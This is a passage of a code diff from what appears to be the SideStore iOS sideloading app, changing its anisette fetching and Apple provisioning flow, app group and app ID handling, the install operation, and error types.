+                formattedJSON["localUserID"] = self.mdLu!
+                formattedJSON["deviceUniqueIdentifier"] = self.deviceId!
+                
+                // Generate date stuff on client
+                let formatter = DateFormatter()
+                formatter.locale = Locale(identifier: "en_US_POSIX")
+                formatter.calendar = Calendar(identifier: .gregorian)
+                formatter.timeZone = TimeZone.current
+                formatter.dateFormat = "yyyy-MM-dd'T'HH:mm:ss'Z'"
+                let dateString = formatter.string(from: Date())
+                formattedJSON["date"] = dateString
+                formattedJSON["locale"] = Locale.current.identifier
+                formattedJSON["timeZone"] = TimeZone.current.abbreviation()
+            } else {
+                if let deviceDescription = json["X-MMe-Client-Info"] { formattedJSON["deviceDescription"] = deviceDescription }
+                if let localUserID = json["X-Apple-I-MD-LU"] { formattedJSON["localUserID"] = localUserID }
+                if let deviceUniqueIdentifier = json["X-Mme-Device-Id"] { formattedJSON["deviceUniqueIdentifier"] = deviceUniqueIdentifier }
+                
+                if let date = json["X-Apple-I-Client-Time"] { formattedJSON["date"] = date }
+                if let locale = json["X-Apple-Locale"] { formattedJSON["locale"] = locale }
+                if let timeZone = json["X-Apple-I-TimeZone"] { formattedJSON["timeZone"] = timeZone }
+            }
+            
+            if let response = response,
+               let version = response.value(forHTTPHeaderField: "Implementation-Version") {
+                print("Implementation-Version: \(version)")
+            } else { print("No Implementation-Version header") }
+            
+            print("Anisette used: \(formattedJSON)")
+            print("Original JSON: \(json)")
+            if let anisette = ALTAnisetteData(json: formattedJSON) {
+                print("Anisette is valid!")
+                self.finish(.success(anisette))
+            } else {
+                print("Anisette is invalid!!!!")
+                if v3 {
+                    throw OperationError.anisetteV3Error(message: "Invalid anisette (the returned data may not have all the required fields)")
+                } else {
+                    throw OperationError.anisetteV1Error(message: "Invalid anisette (the returned data may not have all the required fields)")
+                }
+            }
+        } else {
+            if v3 {
+                throw OperationError.anisetteV3Error(message: "Invalid anisette (the returned data may not be in JSON)")
+            } else {
+                throw OperationError.anisetteV1Error(message: "Invalid anisette (the returned data may not be in JSON)")
+            }
+        }
+    }
+    
+    // MARK: - V1
+    
+    func handleV1() {
+        print("Server is V1")
+        
+        if UserDefaults.shared.trustedServerURL == AnisetteManager.currentURLString {
+            print("Server has already been trusted, fetching anisette")
+            return self.fetchAnisetteV1()
+        }
+        
+        print("Alerting user about outdated server")
+        let alert = UIAlertController(title: "WARNING: Outdated anisette server", message: "We've detected you are using an older anisette server. Using this server has a higher likelihood of locking your account and causing other issues. Are you sure you want to continue?", preferredStyle: UIAlertController.Style.alert)
+        alert.addAction(UIAlertAction(title: "Continue", style: UIAlertAction.Style.destructive, handler: { action in
+            print("Fetching anisette via V1")
+            UserDefaults.shared.trustedServerURL = AnisetteManager.currentURLString
+            self.fetchAnisetteV1()
+        }))
+        alert.addAction(UIAlertAction(title: "Cancel", style: UIAlertAction.Style.cancel, handler: { action in
+            print("Cancelled anisette operation")
+            self.finish(.failure(OperationError.cancelled))
+        }))
+
+        let keyWindow = UIApplication.shared.windows.filter { $0.isKeyWindow }.first
+
+        DispatchQueue.main.async {
+            if let presentingController = keyWindow?.rootViewController?.presentedViewController {
+                presentingController.present(alert, animated: true)
+            } else {
+                keyWindow?.rootViewController?.present(alert, animated: true)
+            }
+        }
+    }
+    
+    func fetchAnisetteV1() {
+        print("Fetching anisette V1")
+        URLSession.shared.dataTask(with: self.url!) { data, response, error in
+            do {
+                guard let data = data, error == nil else { throw OperationError.anisetteV1Error(message: "Unable to fetch data\(error != nil ? " (\(error!.localizedDescription))" : "")") }
+                
+                try self.extractAnisetteData(data, response as? HTTPURLResponse, v3: false)
             } catch let error as NSError {
                 print("Failed to load: \(error.localizedDescription)")
                 self.finish(.failure(error))
             }
-            
+        }.resume()
+    }
+    
+    // MARK: - V3: PROVISIONING
+    
+    func provision() {
+        fetchClientInfo {
+            print("Getting provisioning URLs")
+            var request = self.buildAppleRequest(url: URL(string: "https://gsa.apple.com/grandslam/GsService2/lookup")!)
+            request.httpMethod = "GET"
+            URLSession.shared.dataTask(with: request) { data, response, error in
+                if let data = data,
+                   let plist = try? PropertyListSerialization.propertyList(from: data, format: nil) as? Dictionary<String, Dictionary<String, Any>>,
+                   let startProvisioningString = plist["urls"]?["midStartProvisioning"] as? String,
+                   let startProvisioningURL = URL(string: startProvisioningString),
+                   let endProvisioningString = plist["urls"]?["midFinishProvisioning"] as? String,
+                   let endProvisioningURL = URL(string: endProvisioningString) {
+                    self.startProvisioningURL = startProvisioningURL
+                    self.endProvisioningURL = endProvisioningURL
+                    print("startProvisioningURL: \(self.startProvisioningURL!.absoluteString)")
+                    print("endProvisioningURL: \(self.endProvisioningURL!.absoluteString)")
+                    print("Starting a provisioning session")
+                    self.startProvisioningSession()
+                } else {
+                    print("Apple didn't give valid URLs! Got response: \(String(data: data ?? Data("nothing".utf8), encoding: .utf8) ?? "not utf8")")
+                    self.finish(.failure(OperationError.provisioningError(result: "Apple didn't give valid URLs. Please try again later", message: nil)))
+                }
+            }.resume()
+        }
+    }
+    
+    func startProvisioningSession() {
+        let provisioningSessionURL = self.url!.appendingPathComponent("v3").appendingPathComponent("provisioning_session")
+        var wsRequest = URLRequest(url: provisioningSessionURL)
+        wsRequest.timeoutInterval = 5
+        self.socket = WebSocket(request: wsRequest)
+        self.socket.delegate = self
+        self.socket.connect()
+    }
+    
+    func didReceive(event: WebSocketEvent, client: WebSocketClient) {
+        switch event {
+        case .text(let string):
+            do {
+                if let json = try JSONSerialization.jsonObject(with: string.data(using: .utf8)!, options: []) as? [String: Any] {
+                    guard let result = json["result"] as? String else {
+                        print("The server didn't give us a result")
+                        client.disconnect(closeCode: 0)
+                        self.finish(.failure(OperationError.provisioningError(result: "The server didn't give us a result", message: nil)))
+                        return
+                    }
+                    print("Received result: \(result)")
+                    switch result {
+                    case "GiveIdentifier":
+                        print("Giving identifier")
+                        client.json(["identifier": Keychain.shared.identifier!])
+                        
+                    case "GiveStartProvisioningData":
+                        print("Getting start provisioning data")
+                        let body = [
+                            "Header": [String: Any](),
+                            "Request": [String: Any](),
+                        ]
+                        var request = self.buildAppleRequest(url: self.startProvisioningURL!)
+                        request.httpMethod = "POST"
+                        request.httpBody = try! PropertyListSerialization.data(fromPropertyList: body, format: .xml, options: 0)
+                        URLSession.shared.dataTask(with: request) { data, response, error in
+                            if let data = data,
+                               let plist = try? PropertyListSerialization.propertyList(from: data, format: nil) as? Dictionary<String, Dictionary<String, Any>>,
+                               let spim = plist["Response"]?["spim"] as? String {
+                                print("Giving start provisioning data")
+                                client.json(["spim": spim])
+                            } else {
+                                print("Apple didn't give valid start provisioning data! Got response: \(String(data: data ?? Data("nothing".utf8), encoding: .utf8) ?? "not utf8")")
+                                client.disconnect(closeCode: 0)
+                                self.finish(.failure(OperationError.provisioningError(result: "Apple didn't give valid start provisioning data. Please try again later", message: nil)))
+                            }
+                        }.resume()
+                        
+                    case "GiveEndProvisioningData":
+                        print("Getting end provisioning data")
+                        guard let cpim = json["cpim"] as? String else {
+                            print("The server didn't give us a cpim")
+                            client.disconnect(closeCode: 0)
+                            self.finish(.failure(OperationError.provisioningError(result: "The server didn't give us a cpim", message: nil)))
+                            return
+                        }
+                        let body = [
+                            "Header": [String: Any](),
+                            "Request": [
+                                "cpim": cpim,
+                            ],
+                        ]
+                        var request = self.buildAppleRequest(url: self.endProvisioningURL!)
+                        request.httpMethod = "POST"
+                        request.httpBody = try! PropertyListSerialization.data(fromPropertyList: body, format: .xml, options: 0)
+                        URLSession.shared.dataTask(with: request) { data, response, error in
+                            if let data = data,
+                               let plist = try? PropertyListSerialization.propertyList(from: data, format: nil) as? Dictionary<String, Dictionary<String, Any>>,
+                               let ptm = plist["Response"]?["ptm"] as? String,
+                               let tk = plist["Response"]?["tk"] as? String {
+                                print("Giving end provisioning data")
+                                client.json(["ptm": ptm, "tk": tk])
+                            } else {
+                                print("Apple didn't give valid end provisioning data! Got response: \(String(data: data ?? Data("nothing".utf8), encoding: .utf8) ?? "not utf8")")
+                                client.disconnect(closeCode: 0)
+                                self.finish(.failure(OperationError.provisioningError(result: "Apple didn't give valid end provisioning data. Please try again later", message: nil)))
+                            }
+                        }.resume()
+                        
+                    case "ProvisioningSuccess":
+                        print("Provisioning succeeded!")
+                        client.disconnect(closeCode: 0)
+                        guard let adiPb = json["adi_pb"] as? String else {
+                            print("The server didn't give us an adi.pb file")
+                            self.finish(.failure(OperationError.provisioningError(result: "The server didn't give us an adi.pb file", message: nil)))
+                            return
+                        }
+                        Keychain.shared.adiPb = adiPb
+                        self.fetchAnisetteV3(Keychain.shared.identifier!, Keychain.shared.adiPb!)
+                        
+                    default:
+                        if result.contains("Error") || result.contains("Invalid") || result == "ClosingPerRequest" || result == "Timeout" || result == "TextOnly" {
+                            print("Failing because of \(result)")
+                            self.finish(.failure(OperationError.provisioningError(result: result, message: json["message"] as? String)))
+                        }
+                    }
+                }
+            } catch let error as NSError {
+                print("Failed to handle text: \(error.localizedDescription)")
+                self.finish(.failure(OperationError.provisioningError(result: error.localizedDescription, message: nil)))
+            }
+            
+        case .connected:
+            print("Connected")
+            
+        case .disconnected(let string, let code):
+            print("Disconnected: \(code); \(string)")
+            
+        case .error(let error):
+            print("Got error: \(String(describing: error))")
+            
+        default:
+            print("Unknown event: \(event)")
+        }
+    }
+    
+    func buildAppleRequest(url: URL) -> URLRequest {
+        var request = URLRequest(url: url)
+        request.setValue(self.clientInfo!, forHTTPHeaderField: "X-Mme-Client-Info")
+        request.setValue(self.userAgent!, forHTTPHeaderField: "User-Agent")
+        request.setValue("text/x-xml-plist", forHTTPHeaderField: "Content-Type")
+        request.setValue("*/*", forHTTPHeaderField: "Accept")
+
+        request.setValue(self.mdLu!, forHTTPHeaderField: "X-Apple-I-MD-LU")
+        request.setValue(self.deviceId!, forHTTPHeaderField: "X-Mme-Device-Id")
+
+        let formatter = DateFormatter()
+        formatter.locale = Locale(identifier: "en_US_POSIX")
+        formatter.calendar = Calendar(identifier: .gregorian)
+        formatter.timeZone = TimeZone(identifier: "UTC")
+        formatter.dateFormat = "yyyy-MM-dd'T'HH:mm:ss'Z'"
+        let dateString = formatter.string(from: Date())
+        request.setValue(dateString, forHTTPHeaderField: "X-Apple-I-Client-Time")
+        request.setValue(Locale.current.identifier, forHTTPHeaderField: "X-Apple-Locale")
+        request.setValue(TimeZone.current.abbreviation(), forHTTPHeaderField: "X-Apple-I-TimeZone")
+        return request
+    }
+    
+    // MARK: - V3: FETCHING
+    
+    func fetchClientInfo(_ callback: @escaping () -> Void) {
+        if  self.clientInfo != nil &&
+                self.userAgent != nil &&
+                self.mdLu != nil &&
+                self.deviceId != nil &&
+                Keychain.shared.identifier != nil {
+            print("Skipping client_info fetch since all the properties we need aren't nil")
+            return callback()
+        }
+        print("Trying to get client_info")
+        let clientInfoURL = self.url!.appendingPathComponent("v3").appendingPathComponent("client_info")
+        URLSession.shared.dataTask(with: clientInfoURL) { data, response, error in
+            do {
+                guard let data = data, error == nil else {
+                    return self.finish(.failure(OperationError.anisetteV3Error(message: "Couldn't fetch client info. The server may be down\(error != nil ? " (\(error!.localizedDescription))" : "")")))
+                }
+                
+                if let json = try JSONSerialization.jsonObject(with: data, options: []) as? [String: String] {
+                    if let clientInfo = json["client_info"] {
+                        print("Server is V3")
+                        
+                        self.clientInfo = clientInfo
+                        self.userAgent = json["user_agent"]!
+                        print("Client-Info: \(self.clientInfo!)")
+                        print("User-Agent: \(self.userAgent!)")
+                        
+                        if Keychain.shared.identifier == nil {
+                            print("Generating identifier")
+                            var bytes = [Int8](repeating: 0, count: 16)
+                            let status = SecRandomCopyBytes(kSecRandomDefault, bytes.count, &bytes)
+                            
+                            if status != errSecSuccess {
+                                print("ERROR GENERATING IDENTIFIER!!! \(status)")
+                                return self.finish(.failure(OperationError.provisioningError(result: "Couldn't generate identifier", message: nil)))
+                            }
+                            
+                            Keychain.shared.identifier = Data(bytes: &bytes, count: bytes.count).base64EncodedString()
+                        }
+                        
+                        let decoded = Data(base64Encoded: Keychain.shared.identifier!)!
+                        self.mdLu = decoded.sha256().hexEncodedString()
+                        print("X-Apple-I-MD-LU: \(self.mdLu!)")
+                        let uuid: UUID = decoded.object()
+                        self.deviceId = uuid.uuidString.uppercased()
+                        print("X-Mme-Device-Id: \(self.deviceId!)")
+                        
+                        callback()
+                    } else { self.handleV1() }
+                } else { self.finish(.failure(OperationError.anisetteV3Error(message: "Couldn't fetch client info. The returned data may not be in JSON"))) }
+            } catch let error as NSError {
+                print("Failed to load: \(error.localizedDescription)")
+                self.handleV1()
+            }
+        }.resume()
+    }
+    
+    func fetchAnisetteV3(_ identifier: String, _ adiPb: String) {
+        fetchClientInfo {
+            print("Fetching anisette V3")
+            let url = UserDefaults.standard.menuAnisetteURL
+            var request = URLRequest(url: self.url!.appendingPathComponent("v3").appendingPathComponent("get_headers"))
+            request.httpMethod = "POST"
+            request.httpBody = try! JSONSerialization.data(withJSONObject: [
+                "identifier": identifier,
+                "adi_pb": adiPb
+            ], options: [])
+            request.setValue("application/json", forHTTPHeaderField: "Content-Type")
+            URLSession.shared.dataTask(with: request) { data, response, error in
+                do {
+                    guard let data = data, error == nil else { throw OperationError.anisetteV3Error(message: "Couldn't fetch anisette") }
+                    
+                    try self.extractAnisetteData(data, response as? HTTPURLResponse, v3: true)
+                } catch let error as NSError {
+                    print("Failed to load: \(error.localizedDescription)")
+                    self.finish(.failure(error))
+                }
+            }.resume()
         }
-        
-        task.resume()
     }
 }
+
+extension WebSocketClient {
+    func json(_ dictionary: [String: String]) {
+        let data = try! JSONSerialization.data(withJSONObject: dictionary, options: [])
+        self.write(string: String(data: data, encoding: .utf8)!)
+    }
+}
+
+extension Data {
+    // https://stackoverflow.com/a/25391020
+    func sha256() -> Data {
+        var hash = [UInt8](repeating: 0,  count: Int(CC_SHA256_DIGEST_LENGTH))
+        self.withUnsafeBytes {
+            _ = CC_SHA256($0.baseAddress, CC_LONG(self.count), &hash)
+        }
+        return Data(hash)
+    }
+    
+    // https://stackoverflow.com/a/40089462
+    func hexEncodedString() -> String {
+        return self.map { String(format: "%02hhX", $0) }.joined()
+    }
+    
+    // https://stackoverflow.com/a/59127761
+    func object<T>() -> T { self.withUnsafeBytes { $0.load(as: T.self) } }
+}

AltStore/Operations/FetchAppIDsOperation.swift

@@ -39,7 +39,9 @@ final class FetchAppIDsOperation: ResultOperation<([AppID], NSManagedObjectConte
         guard
             let team = self.context.team,
             let session = self.context.session
-        else { return self.finish(.failure(OperationError.invalidParameters)) }
+        else {
+            return self.finish(.failure(OperationError.invalidParameters("FetchAppIDsOperation.main: self.context.team or self.context.session is nil")))
+        }
                 
         ALTAppleAPI.shared.fetchAppIDs(for: team, session: session) { (appIDs, error) in
             self.managedObjectContext.perform {

AltStore/Operations/FetchProvisioningProfilesOperation.swift

@@ -43,10 +43,11 @@ final class FetchProvisioningProfilesOperation: ResultOperation<[String: ALTProv
         guard
             let team = self.context.team,
             let session = self.context.session
-        else { return self.finish(.failure(OperationError.invalidParameters)) }
-        
-        guard let app = self.context.app else { return self.finish(.failure(OperationError.appNotFound)) }
+        else {
+            return self.finish(.failure(OperationError.invalidParameters("FetchProvisioningProfilesOperation.main: self.context.team or self.context.session is nil"))) }
         
+        guard let app = self.context.app else { return self.finish(.failure(OperationError.appNotFound(name: nil))) }
+
         self.progress.totalUnitCount = Int64(1 + app.appExtensions.count)
         
         self.prepareProvisioningProfile(for: app, parentApp: nil, team: team, session: session) { (result) in
@@ -260,7 +261,7 @@ extension FetchProvisioningProfilesOperation
                         {
                             if let expirationDate = sortedExpirationDates.first
                             {
-                                throw OperationError.maximumAppIDLimitReached(application: application, requiredAppIDs: requiredAppIDs, availableAppIDs: availableAppIDs, nextExpirationDate: expirationDate)
+                                throw OperationError.maximumAppIDLimitReached(appName: application.name, requiredAppIDs: requiredAppIDs, availableAppIDs: availableAppIDs, expirationDate: expirationDate)
                             }
                             else
                             {
@@ -268,8 +269,17 @@ extension FetchProvisioningProfilesOperation
                             }
                         }
                     }
+                    //App ID name must be ascii. If the name is not ascii, using bundleID instead
+                    let appIDName: String
+                    if !name.allSatisfy({ $0.isASCII }) {
+                        //Contains non ASCII (Such as Chinese/Japanese...), using bundleID
+                        appIDName = bundleIdentifier
+                    }else {
+                        //ASCII text, keep going as usual
+                        appIDName = name
+                    }
                     
-                    ALTAppleAPI.shared.addAppID(withName: name, bundleIdentifier: bundleIdentifier, team: team, session: session) { (appID, error) in
+                    ALTAppleAPI.shared.addAppID(withName: appIDName, bundleIdentifier: bundleIdentifier, team: team, session: session) { (appID, error) in
                         do
                         {
                             do
@@ -281,7 +291,7 @@ extension FetchProvisioningProfilesOperation
                             {
                                 if let expirationDate = sortedExpirationDates.first
                                 {
-                                    throw OperationError.maximumAppIDLimitReached(application: application, requiredAppIDs: requiredAppIDs, availableAppIDs: availableAppIDs, nextExpirationDate: expirationDate)
+                                    throw OperationError.maximumAppIDLimitReached(appName: application.name, requiredAppIDs: requiredAppIDs, availableAppIDs: availableAppIDs, expirationDate: expirationDate)
                                 }
                                 else
                                 {
@@ -384,19 +394,39 @@ extension FetchProvisioningProfilesOperation
         
         if app.isAltStoreApp
         {
+            print("Application groups before modifying for SideStore: \(applicationGroups)")
+            
+            // Remove app groups that contain AltStore since they can be problematic (cause SideStore to expire early)
+            for (index, group) in applicationGroups.enumerated() {
+                if group.contains("AltStore") {
+                    print("Removing application group: \(group)")
+                    applicationGroups.remove(at: index)
+                }
+            }
+            
+            // Make sure we add .AltWidget for the widget
+            var altStoreAppGroupID = Bundle.baseAltStoreAppGroupID
+            for (_, group) in applicationGroups.enumerated() {
+                if group.contains("AltWidget") {
+                    altStoreAppGroupID += ".AltWidget"
+                    break
+                }
+            }
+            
             // Potentially updating app groups for this specific AltStore.
             // Find the (unique) AltStore app group, then replace it
             // with the correct "base" app group ID.
             // Otherwise, we may append a duplicate team identifier to the end.
             if let index = applicationGroups.firstIndex(where: { $0.contains(Bundle.baseAltStoreAppGroupID) })
             {
-                applicationGroups[index] = Bundle.baseAltStoreAppGroupID
+                applicationGroups[index] = altStoreAppGroupID
             }
             else
             {
-                applicationGroups.append(Bundle.baseAltStoreAppGroupID)
+                applicationGroups.append(altStoreAppGroupID)
             }
         }
+        print("Application groups: \(applicationGroups)")
         
         // Dispatch onto global queue to prevent appGroupsLock deadlock.
         DispatchQueue.global().async {

AltStore/Operations/InstallAppOperation.swift

@@ -8,9 +8,10 @@
 import Foundation
 import Network
 
-import AltSign
 import AltStoreCore
+import AltSign
 import Roxas
+import minimuxer
 
 @objc(InstallAppOperation)
 final class InstallAppOperation: ResultOperation<InstalledApp>
@@ -40,12 +41,16 @@ final class InstallAppOperation: ResultOperation<InstalledApp>
         
         guard
             let certificate = self.context.certificate,
-            let resignedApp = self.context.resignedApp
-        else { return self.finish(.failure(OperationError.invalidParameters)) }
+            let resignedApp = self.context.resignedApp,
+            let provisioningProfiles = self.context.provisioningProfiles
+        else {
+            return self.finish(.failure(OperationError.invalidParameters("InstallAppOperation.main: self.context.certificate or self.context.resignedApp or self.context.provisioningProfiles is nil")))
+        }
         
         let backgroundContext = DatabaseManager.shared.persistentContainer.newBackgroundContext()
-        backgroundContext.perform
-        {
+        backgroundContext.perform {
+            
+            
             /* App */
             let installedApp: InstalledApp
             
@@ -109,14 +114,29 @@ final class InstallAppOperation: ResultOperation<InstalledApp>
             }
             
             installedApp.appExtensions = installedExtensions
+
+            // Remove stale "PlugIns" (Extensions) from currently installed App
+            if let installedAppExns = ALTApplication(fileURL: installedApp.fileURL)?.appExtensions {
+                let currentAppExns = Set(installedApp.appExtensions).map{ $0.bundleIdentifier }
+                let staleAppExns = installedAppExns.filter{ !currentAppExns.contains($0.bundleIdentifier) }
+                
+                for staleAppExn in staleAppExns {
+                    do {
+                        try FileManager.default.removeItem(at: staleAppExn.fileURL)
+                        print("InstallAppOperation.appExtensions: removed stale app-extension: \(staleAppExn.fileURL)")
+                    } catch {
+                        print("InstallAppOperation.appExtensions processing error Error: \(error)")
+                    }
+                }
+            }
+            
             
             self.context.beginInstallationHandler?(installedApp)
             
             // Temporary directory and resigned .ipa no longer needed, so delete them now to ensure AltStore doesn't quit before we get the chance to.
             self.cleanUp()
             
-            var activeProfiles: Set<String>?
-            if let sideloadedAppsLimit = UserDefaults.standard.activeAppsLimit
+            if let sideloadedAppsLimit = UserDefaults.standard.activeAppsLimit, provisioningProfiles.contains(where: { $1.isFreeProvisioningProfile == true })
             {
                 // When installing these new profiles, AltServer will remove all non-active profiles to ensure we remain under limit.
                 
@@ -141,63 +161,70 @@ final class InstallAppOperation: ResultOperation<InstalledApp>
                         installedApp.isActive = false
                     }
                 }
-                
-                activeProfiles = Set(activeApps.flatMap
-                { installedApp -> [String] in
-                    let appExtensionProfiles = installedApp.appExtensions.map { $0.resignedBundleIdentifier }
-                    return [installedApp.resignedBundleIdentifier] + appExtensionProfiles
-                })
-            }
-            
-            let ns_bundle = NSString(string: installedApp.bundleIdentifier)
-            let ns_bundle_ptr = UnsafeMutablePointer<CChar>(mutating: ns_bundle.utf8String)
-            
-            let res = minimuxer_install_ipa(ns_bundle_ptr)
-            if res == 0
-            {
-                installedApp.refreshedDate = Date()
-                self.finish(.success(installedApp))
-            }
-            else if res == -15
-            {
-                // try again
-                if UserDefaults.standard.enableCowExploit && UserDefaults.standard.isCowExploitSupported
-                {
-                    patch3AppLimit
-                    { result in
-                        switch result
-                        {
-                        case .success:
-                            UserDefaults.standard.set(bootTime(), forKey: "cowExploitRanBootTime")
-                            print("patched sucessfully")
-                        case .failure(let err):
-                            switch err
-                            {
-                            case .NoFDA:
-                                self.finish(.failure(OperationError.cowExploitNoFDA))
-                                return
-                            case .FailedPatchd:
-                                self.finish(.failure(OperationError.cowExploitFailedPatchd))
-                                return
-                            }
-                        }
-                    }
-                    
-                    let res_try_again = minimuxer_install_ipa(ns_bundle_ptr)
-                    if res_try_again == 0
-                    {
-                        installedApp.refreshedDate = Date()
-                        self.finish(.success(installedApp))
-                    }
-                    else
-                    {
-                        self.finish(.failure(minimuxer_to_operation(code: res_try_again)))
-                    }
-                }
             }
             else
             {
-                self.finish(.failure(minimuxer_to_operation(code: res)))
+                installedApp.isActive = true
+            }
+            
+            var installing = true
+            if installedApp.storeApp?.bundleIdentifier.range(of: Bundle.Info.appbundleIdentifier) != nil {
+                // Reinstalling ourself will hang until we leave the app, so we need to exit it without force closing
+                DispatchQueue.main.asyncAfter(deadline: .now() + 3) {
+                    if UIApplication.shared.applicationState != .active {
+                        print("We are not in the foreground, let's not do anything")
+                        return
+                    }
+                    if !installing {
+                        print("Installing finished")
+                        return
+                    }
+                    print("We are still installing after 3 seconds")
+                    UNUserNotificationCenter.current().getNotificationSettings { settings in
+                        switch (settings.authorizationStatus) {
+                        case .authorized, .ephemeral, .provisional:
+                            print("Notifications are enabled")
+
+                            let content = UNMutableNotificationContent()
+                            content.title = "Refreshing..."
+                            content.body = "SideStore will automatically move to the homescreen to finish refreshing!"
+                            let notification = UNNotificationRequest(identifier: Bundle.Info.appbundleIdentifier + ".FinishRefreshNotification", content: content, trigger: UNTimeIntervalNotificationTrigger(timeInterval: 2, repeats: false))
+                            UNUserNotificationCenter.current().add(notification)
+                            break
+                        default:
+                            print("Notifications are not enabled")
+
+                            let alert = UIAlertController(title: "Finish Refresh", message: "Please reopen SideStore after the process is finished.To finish refreshing, SideStore must be moved to the background. To do this, you can either go to the Home Screen manually or by hitting Continue. Please reopen SideStore after doing this.", preferredStyle: .alert)
+                            alert.addAction(UIAlertAction(title: NSLocalizedString("Continue", comment: ""), style: .default, handler: { _ in
+                                print("Going home")
+                                UIApplication.shared.perform(#selector(NSXPCConnection.suspend))
+                            }))
+
+                            DispatchQueue.main.async {
+                                let keyWindow = UIApplication.shared.windows.filter { $0.isKeyWindow }.first
+                                if var topController = keyWindow?.rootViewController {
+                                    while let presentedViewController = topController.presentedViewController {
+                                        topController = presentedViewController
+                                    }
+                                    topController.present(alert, animated: true)
+                                } else {
+                                    print("No key window? Let's just go home")
+                                }
+                            }
+                        }
+                    }
+                    UIApplication.shared.perform(#selector(NSXPCConnection.suspend))
+                }
+            }
+            
+            do {
+                try install_ipa(installedApp.bundleIdentifier)
+                installing = false
+                installedApp.refreshedDate = Date()
+                self.finish(.success(installedApp))
+            } catch let error {
+                installing = false
+                self.finish(.failure(error))
             }
         }
     }
@@ -213,11 +240,14 @@ final class InstallAppOperation: ResultOperation<InstalledApp>
             
             do
             {
-                try FileManager.default.removeItem(at: fileURL)
+                if(FileManager.default.fileExists(atPath: fileURL.path)){
+                    try FileManager.default.removeItem(at: fileURL)
+                    print("Removed refreshed IPA")
+                }
             }
             catch
             {
-                print("Failed to remove refreshed .ipa:", error)
+                print("Failed to remove refreshed .ipa: \(error)")
             }
         }
         

AltStore/Operations/Operation.swift

@@ -12,7 +12,10 @@ import Roxas
 class ResultOperation<ResultType>: Operation
 {
     var resultHandler: ((Result<ResultType, Error>) -> Void)?
-    
+
+    // Should only be set by subclasses
+    var localizedFailure: String?
+
     @available(*, unavailable)
     override func finish()
     {
@@ -22,16 +25,20 @@ class ResultOperation<ResultType>: Operation
     func finish(_ result: Result<ResultType, Error>)
     {
         guard !self.isFinished else { return }
-        
+
+        var result = result
+
         if self.isCancelled
         {
-            self.resultHandler?(.failure(OperationError.cancelled))
+            result = .failure(OperationError.cancelled)
         }
-        else
-        {
-            self.resultHandler?(result)
+        else if case .failure(let nsError as NSError) = result, let localizedFailure, nsError.localizedFailure == nil {
+            // Error doesn't have its own localizedFailure, so we give it the Operation's (if it exists)
+            let error = nsError.withLocalizedFailure(localizedFailure)
+            result = .failure(error)
         }
-        
+        self.resultHandler?(result)
+
         super.finish()
     }
 }

AltStore/Operations/OperationError.swift

@@ -6,110 +6,232 @@
 //  Copyright © 2019 Riley Testut. All rights reserved.
 //
 
-import AltSign
 import Foundation
+import AltSign
+import AltStoreCore
+import minimuxer
 
-enum OperationError: LocalizedError {
-    static let domain = OperationError.unknown._domain
+extension OperationError
+{
+    enum Code: Int, ALTErrorCode, CaseIterable {
+        typealias Error = OperationError
+
+        // General
+        case unknown = 1000
+        case unknownResult
+        case cancelled
+        case timedOut
+        case unableToConnectSideJIT
+        case unableToRespondSideJITDevice
+        case wrongSideJITIP
+        case SideJITIssue // (error: String)
+        case refreshsidejit
+        case notAuthenticated
+        case appNotFound
+        case unknownUDID
+        case invalidApp
+        case invalidParameters
+        case maximumAppIDLimitReached//((application: ALTApplication, requiredAppIDs: Int, availableAppIDs: Int, nextExpirationDate: Date)
+        case noSources
+        case openAppFailed//(name: String)
+        case missingAppGroup
+        case refreshAppFailed
+
+        // Connection
+        case noWiFi = 1200
+        case tooNewError
+        case anisetteV1Error//(message: String)
+        case provisioningError//(result: String, message: String?)
+        case anisetteV3Error//(message: String)
+
+        case cacheClearError//(errors: [String])
+    }
+
+    static let unknownResult: OperationError = .init(code: .unknownResult)
+    static let cancelled: OperationError = .init(code: .cancelled)
+    static let timedOut: OperationError = .init(code: .timedOut)
+    static let unableToConnectSideJIT: OperationError = .init(code: .unableToConnectSideJIT)
+    static let unableToRespondSideJITDevice: OperationError = .init(code: .unableToRespondSideJITDevice)
+    static let wrongSideJITIP: OperationError = .init(code: .wrongSideJITIP)
+    static let notAuthenticated: OperationError = .init(code: .notAuthenticated)
+    static let unknownUDID: OperationError = .init(code: .unknownUDID)
+    static let invalidApp: OperationError = .init(code: .invalidApp)
+    static let noSources: OperationError = .init(code: .noSources)
+    static let missingAppGroup: OperationError = .init(code: .missingAppGroup)
+
+    static let noWiFi: OperationError = .init(code: .noWiFi)
+    static let tooNewError: OperationError = .init(code: .tooNewError)
+    static let provisioningError: OperationError = .init(code: .provisioningError)
+    static let anisetteV1Error: OperationError = .init(code: .anisetteV1Error)
+    static let anisetteV3Error: OperationError = .init(code: .anisetteV3Error)
+
+    static let cacheClearError: OperationError = .init(code: .cacheClearError)
+
+    static func unknown(failureReason: String? = nil, file: String = #fileID, line: UInt = #line) -> OperationError {
+        OperationError(code: .unknown, failureReason: failureReason, sourceFile: file, sourceLine: line)
+    }
+
+    static func appNotFound(name: String?) -> OperationError {
+        OperationError(code: .appNotFound, appName: name)
+    }
+
+    static func openAppFailed(name: String?) -> OperationError {
+        OperationError(code: .openAppFailed, appName: name)
+    }
+    static let domain = OperationError(code: .unknown)._domain
     
-    case unknown
-    case unknownResult
-    case cancelled
-    case timedOut
+    static func SideJITIssue(error: String?) -> OperationError {
+        var o = OperationError(code: .SideJITIssue)
+        o.errorFailure = error
+        return o
+    }
     
-    case notAuthenticated
-    case appNotFound
-    
-    case unknownUDID
-    
-    case invalidApp
-    case invalidParameters
-    
-    case maximumAppIDLimitReached(application: ALTApplication, requiredAppIDs: Int, availableAppIDs: Int, nextExpirationDate: Date)
-    
-    case noSources
-    
-    case openAppFailed(name: String)
-    case missingAppGroup
-    
-    case noDevice
-    case createService(name: String)
-    case getFromDevice(name: String)
-    case setArgument(name: String)
-    case afc
-    case install
-    case uninstall
-    case lookupApps
-    case detach
-    case functionArguments
-    case profileInstall
-    case noConnection
-    case cowExploitNoFDA
-    case cowExploitFailedPatchd
-    
-    var failureReason: String? {
-        switch self {
-        case .unknown: return NSLocalizedString("An unknown error occured.", comment: "")
+    static func maximumAppIDLimitReached(appName: String, requiredAppIDs: Int, availableAppIDs: Int, expirationDate: Date) -> OperationError {
+        OperationError(code: .maximumAppIDLimitReached, appName: appName, requiredAppIDs: requiredAppIDs, availableAppIDs: availableAppIDs, expirationDate: expirationDate)
+    }
+
+    static func provisioningError(result: String, message: String?) -> OperationError {
+        var o = OperationError(code: .provisioningError, failureReason: result)
+        o.errorTitle = message
+        return o
+    }
+
